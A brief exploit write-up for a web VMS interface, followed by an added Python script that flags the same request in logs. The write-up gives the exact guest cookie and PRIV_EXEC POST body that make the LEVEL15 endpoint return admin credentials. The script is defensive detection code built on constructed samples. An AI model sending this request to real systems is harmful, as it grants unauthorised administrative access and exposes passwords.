<p>Use ModifyHeaders to set the Cookie header to:</p><pre class="">auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;</pre><p>Use Hackbar to send a POST request to:</p><pre class="">http://localhost/WEB_VMS/LEVEL15/</pre><p>with the following body:</p><pre class="">command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.</pre><p><img alt="DD01098A-E0CE-49EE-B8BC-644CA26EA9F6.png" src="https://images.seebug.org/@/uploads/1434695128838-DD01098A-E0CE-49EE-B8BC-644CA26EA9F6.png" data-image-size="524,111"><br></p><p>This returns the admin account and password.</p><p><img alt="5FB5B5B1-32E4-485E-9E92-75E54B3DFDC0.png" src="https://images.seebug.org/@/uploads/1434695143339-5FB5B5B1-32E4-485E-9E92-75E54B3DFDC0.png" data-image-size="512,292"><br></p>
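<p>Added example, not part of the original write-up: a log check that flags the request pattern shown above, where a session whose auth cookie decodes to a low-privilege user submits a PRIV_EXEC command to LEVEL15. It assumes the auth cookie is base64 of user:password (which is how the value on the page decodes) and that guest must never reach that path; the log tuples, the second command and the admin credential are constructed.</p>

```python
import base64
from urllib.parse import parse_qs, unquote

PRIV_PATH = "/WEB_VMS/LEVEL15/"  # path from the page
LOW_PRIV_USERS = {"guest"}       # assumption: accounts that must not reach LEVEL15

def cookie_user(cookie_header):
    """Return the user name inside the auth cookie (base64 of user:password)."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "auth":
            try:
                raw = base64.b64decode(unquote(value), validate=True)
                return raw.decode("utf-8").partition(":")[0]
            except ValueError:  # malformed base64 or invalid UTF-8
                return None
    return None

def flag_request(method, path, cookie_header, body):
    """Return a finding when a low-privilege session submits a PRIV_EXEC command."""
    if method != "POST" or not path.startswith(PRIV_PATH):
        return None
    user = cookie_user(cookie_header)
    params = parse_qs(body, keep_blank_values=True)
    mode = params.get("mode", [""])[0]
    command = params.get("command", [""])[0].strip()
    if user in LOW_PRIV_USERS and "PRIV_EXEC" in mode and command:
        return {"user": user, "path": path, "command": command}
    return None

# Constructed sample log entries: (method, path, Cookie header, body).
ADMIN_AUTH = base64.b64encode(b"admin:example").decode()  # constructed credential
SAMPLES = [
    ("POST", "/WEB_VMS/LEVEL15/", "auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;",
     "command=show%20webmaster%20users%0D%0A&strurl=exec%04"
     "&mode=%02PRIV_EXEC&signname=Red-Giant."),
    ("POST", "/WEB_VMS/LEVEL15/", "auth=" + ADMIN_AUTH + "; user=admin;",
     "command=show%20version%0D%0A&strurl=exec%04&mode=%02PRIV_EXEC"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[2].split(";")[0], "->", flag_request(*sample))
```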